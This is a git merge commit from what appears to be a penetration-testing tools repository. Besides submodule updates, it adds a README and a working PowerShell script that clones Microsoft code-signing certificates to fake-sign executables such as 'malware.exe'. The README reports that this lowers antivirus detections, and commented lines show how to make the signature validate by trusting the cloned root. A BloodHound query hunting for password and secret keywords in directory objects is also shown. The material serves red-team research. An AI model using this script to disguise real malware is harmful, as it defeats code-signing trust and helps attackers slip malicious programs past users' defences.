Merge branch 'master' of github.com:mgeeky/Penetration-Testing-Tools

This commit is contained in:
Mariusz B. / mgeeky 2022-08-10 02:36:07 +02:00
commit ba09824453
19 changed files with 136 additions and 13 deletions

@ -1 +1 @@
Subproject commit 9aa8a2a623077cae13922ba8a9cabe1d17bc5a5c Subproject commit 0c945011fb341f2d5e66a169c2b4b6760592d5b4

@ -1 +1 @@
Subproject commit 75f6270d0417d749b56c718d0d8ad0003c74d785 Subproject commit c887a6501b08670a9585b50938e93ea20470e88c

@ -1 +1 @@
Subproject commit 56f3289d8cd34883a95a0cf3e639dac1a82ce6f2 Subproject commit 878f19a4a342f734da9cc9ca6af1b26a3160cc04

@ -1 +1 @@
Subproject commit b18def7a662f9f3ba9b3b1dc9b54658c63d4952e Subproject commit b5ceae633a9b1995e38dee2192d893bb487ef550

@ -1 +1 @@
Subproject commit 1ce441eb14cb5e639036a4833b0445f986e12601 Subproject commit 81d148956541453179216b6f708c69b28891a48e

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -0,0 +1,25 @@
## Code Signing Certificate Cloning Attack
A Powershell script that signs input Executable file with fake Microsoft code-signing certificate to demonstrate risks of cloned-certificate sign attacks.
Script was shamelessly borrowed from [Matt Graeber, @mattifestation](https://twitter.com/mattifestation) and his research titled:
- [_Code Signing Certificate Cloning Attacks and Defenses_](https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec)
**All credits go to Matt** - this directory contains a copy of his code (_a little tweaked by me_) for preserverance purposes.
### Effectiveness
As of [13/07/2022](https://twitter.com/mariuszbit/status/1547320418821980160) this **dumb trick** still gets off the shelf malware evade detection of at least 8 modern security scanners.
| What | Result |
|------------------------------------------------------------------------------|-----------|
| Mythic Apollo.exe before fake-signing | [30/70](https://www.virustotal.com/gui/file/1413de7cee2c7c161f814fe93256968450b4e99ae65f0b5e7c2e76128526cc73?nocache=1) |
| Mythic Apollo.exe after fake-signing with Microsoft code-signing certificate | [22/70](https://www.virustotal.com/gui/file/34543de8a6b24c98ea526d8f2ae5f1dbe99d64386d8a8f46ddbcdcebaac3df65?nocache=1) |
### Usage
```
PS C:\> . .\Sign-Artifact.ps1
PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile nomalware.exe -Verbose
```

View File

@ -0,0 +1,98 @@
Function Sign-Artifact {
<#
.SYNOPSIS
Signs input executable file with a faked Microsoft code signing certificate.
.DESCRIPTION
This script uses built-into Windows interfaces to import a fake Microsoft code-signing certificate
and use it to sign input executable artifact. Result will be signed, although not verifiable executable.
Based on Matt Graeber's implementation:
https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
.EXAMPLE
PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile microsoft.exe
#>
[CmdletBinding()]
param(
[Parameter(Mandatory=$True)]
[string]
$InputFile,
[Parameter(Mandatory=$True)]
[string]
$OutputFile,
[switch]
$Quiet
)
$Verbose = $PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent
if (-not(Test-Path $InputFile))
{
Write-Error "[!] Input file does not exist! FilePath: $InputFile"
exit 1
}
if(Test-Path $OutputFile)
{
Remove-Item -Force $OutputFile
}
#
# Based on:
#
#
# We'll just store the cloned certificates in current user "Personal" store for now.
$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }
$MS_Root_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "\MSKernel32Root.cer")
$Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation
$MS_PCA_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32PCA.cer")
$Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation
$MS_Leaf_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Leaf.cer")
$Cloned_MS_Leaf_Cert = New-SelfSignedCertificate -CloneCert $MS_Leaf_Cert -Signer $Cloned_MS_PCA_Cert @CertStoreLocation
# Validate that that $OutputFile is not signed.
if($Verbose)
{
Write-Host "`n================================================================================================`n[.] Before signing: `n"
Get-AuthenticodeSignature -FilePath $InputFile
}
Copy-Item -Force $InputFile $OutputFile | Out-Null
# Sign $OutputFile with the cloned Microsoft leaf certificate.
Set-AuthenticodeSignature -Certificate $Cloned_MS_Leaf_Cert -FilePath $OutputFile | Out-Null
# The certificate will not properly validate because the root certificate is not trusted.
# View the StatusMessage property to see the reason why Set-AuthenticodeSignature returned "UnknownError"
# "A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider"
if($Verbose)
{
Write-Host "`n================================================================================================`n[+] After signing: `n"
Get-AuthenticodeSignature -FilePath $OutputFile
}
if(-not $Quiet -or $Verbose)
{
Get-AuthenticodeSignature -FilePath $OutputFile | Format-List *
}
# Save the root certificate to disk and import it into the current user root store.
# Upon doing this, the $OutputFile signature will validate properly.
# Export-Certificate -Type CERT -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -Cert $Cloned_MS_Root_Cert
# Import-Certificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -CertStoreLocation Cert:\CurrentUser\Root\
#
# # You may need to start a new PowerShell process for the valid signature to take effect.
# Get-AuthenticodeSignature -FilePath $FilePath
}

Binary file not shown.

Binary file not shown.

@ -1 +1 @@
Subproject commit d93487d8055668ee9e4b8b12d550a9cf1db7cdc4 Subproject commit fe849f7f3df48c38b2d3abfb0578799c75fb98c9

View File

@ -400,7 +400,7 @@ MATCH (o:OU)-[:Contains]->(c) RETURN o.name,o.guid, COUNT(c) ORDER BY COUNT(c) D
- Retrieves nodes having particular juicy keywords in their name or description properties: - Retrieves nodes having particular juicy keywords in their name or description properties:
``` ```
UNWIND ["admin", "amministratore", "contrase", "empfidlich", "geheim", "hasło", "important", "azure", "MSOL", "Kennwort", "parol", "parola", "pass", "passe", "secret", "secreto", "segreto", "sekret", "sensibil", "sensibile", "sensible", "sensitive", "wrażliw"] AS word MATCH (n) WHERE (toLower(n.name) CONTAINS toLower(word)) OR (toLower(n.description) CONTAINS toLower(word)) RETURN word, n.name, n.description ORDER BY n.name UNWIND ["admin", "amministratore", "contrase", "empfindlich", "geheim", "hasło", "important", "azure", "MSOL", "Kennwort", "parol", "parola", "pass", "passe", "secret", "secreto", "segreto", "sekret", "sensibil", "sensibile", "sensible", "sensitive", "wrażliw"] AS word MATCH (n) WHERE (toLower(n.name) CONTAINS toLower(word)) OR (toLower(n.description) CONTAINS toLower(word)) RETURN word, n.name, n.description ORDER BY n.name
``` ```
- Retrieves nodes that contain UNC paths to SMB shares in their description fields: - Retrieves nodes that contain UNC paths to SMB shares in their description fields:

@ -1 +1 @@
Subproject commit f31499e175e18d04b091bd7f407392378231f4e6 Subproject commit 41836eeb02d1be01222fdd5020d284ea9fec7b3a

@ -1 +1 @@
Subproject commit fc3ac281bc3f79963c8e0e07015f63c164c32b06 Subproject commit 79fcd49a329b243c80da832192c30d500c68bf8e

@ -1 +1 @@
Subproject commit cb7a803493b9ce9fb5a5a3bc1c77773a60194ca4 Subproject commit 424c6d09608821b761f90d0eb4aaa794f79b480a

@ -1 +1 @@
Subproject commit fce3a52d15becf671b52b6f9309ccccdc8aeb2ec Subproject commit f67caea38a7acdb526eae3aac7c451a08edef6a9

@ -1 +1 @@
Subproject commit 414446b226dc963f651988ab6c1aece8e17d4980 Subproject commit ff8dc75967381e6bdfb6820cca564ee5250cce58